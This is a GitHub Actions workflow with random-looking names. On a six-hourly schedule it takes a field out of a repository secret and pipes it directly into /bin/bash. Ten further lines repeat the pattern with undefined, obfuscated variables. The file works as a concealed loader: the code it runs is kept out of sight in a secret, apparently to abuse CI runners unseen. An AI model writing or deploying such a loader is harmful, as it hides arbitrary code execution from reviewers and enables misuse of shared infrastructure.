name: donecartography

on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: donecartography
        env:
          vrd7: ${{ secrets.vrd7 }}
        run: |
          echo $vrd7 | jq -r .uqr7865 | /bin/bash
          echo $gwzcy82891 | jq -r .nj23277 | /bin/bash
          echo $fnb0441 | jq -r .pnta818 | /bin/bash
          echo $ah8389 | jq -r .q60 | /bin/bash
          echo $e85204 | jq -r .jff37625 | /bin/bash
          echo $t09855 | jq -r .jjfzf6114 | /bin/bash
          echo $ro412 | jq -r .s6 | /bin/bash
          echo $q732 | jq -r .yl952 | /bin/bash
          echo $u9 | jq -r .mqx02907 | /bin/bash
          echo $dxw6429 | jq -r .yu28997 | /bin/bash
          echo $vmvce268 | jq -r .yyuhw10 | /bin/bash

